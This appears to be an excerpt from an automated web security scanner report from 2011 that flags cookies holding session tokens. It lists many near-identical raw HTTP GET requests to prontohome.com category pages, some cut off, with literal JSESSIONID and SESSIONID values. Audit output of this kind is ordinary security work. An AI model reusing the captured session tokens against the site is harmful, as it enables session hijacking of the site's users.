The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /productRedirection.do?micrositeId=pronto_home&parentId=4462231-12e14ffec7a-5b53&&nlCellNum=0&exitPoint=disambiguated-search&pageLocation=gridFeaturedProductImage1&merchantProductId=1790835203 HTTP/1.1 Host: www.pronto.com Proxy-Connection: keep-alive Referer: http://www.prontohome.com/prodRedirExitInterst.do?exitPoint=disambiguated-search&merchantProductId=1790835203&pageLocation=gridFeaturedProductImage1&parentId=4462231-12e14ffec7a-5b53 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: V9Q1=3nzgaDHtoPhvmtU4ci8dAjhKb0hwu4DL4JGwutdw3oCfywvv2ADV8Ug; SESSIONID=1537052450; abt=ProntoV3_5_5-1.161-cellNum_8; V_ID=4b3473a3-12e14fe8591-6986; JSESSIONID=626065A52BAAA302471FF69164075061; M_ID=41048ba4-12e1505343e-294f
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 11 Feb 2011 14:31:53 GMT Server: Apache/2.2.4 (Fedora) Set-Cookie: JSESSIONID=AC64775C602DAC00A64012CF57FA9098; Path=/ Set-Cookie: M_ID=41048ba4-12e1505343e-294f; Domain=.pronto.com; Expires=Sun, 10-Feb-2013 14:31:53 GMT; Path=/ P3P: CP="CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV" Set-Cookie: REQUESTID26337=-7a5f0ee9-12e151f174b--6842; Domain=.pronto.com; Expires=Sun, 13-Mar-2011 14:31:53 GMT; Path=/ Location: http://www.bellacor.com/productDetail/547288.htm?partID=pronto-Recessed-547288 Content-Length: 0 Content-Type: text/html;charset=UTF-8 Via: CN-5000 Proxy-Connection: Keep-Alive
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bakeware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bath HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bath-accessories HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bath-mats HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bath-towels HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bathroom-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bathroom-lighting HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bed HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bed-sheets HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bedroom-and-bathroom-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bedskirts HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blankets-and-throws HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /comforters HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /coverlets-and-quilts HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cutlery HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dining HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dining-and-kitchen-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dinnerware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /duvets HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /entryway-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /flatware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /glassware-and-drinkware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home-office-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /kitchen HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /kitchen-electrics HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /kitchen-storage-and-organization HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /kitchen-textiles HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /kitchen-tools HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /lighting HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /living-room-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /outdoor-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pillows HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pots-pans-and-skillets HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serveware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
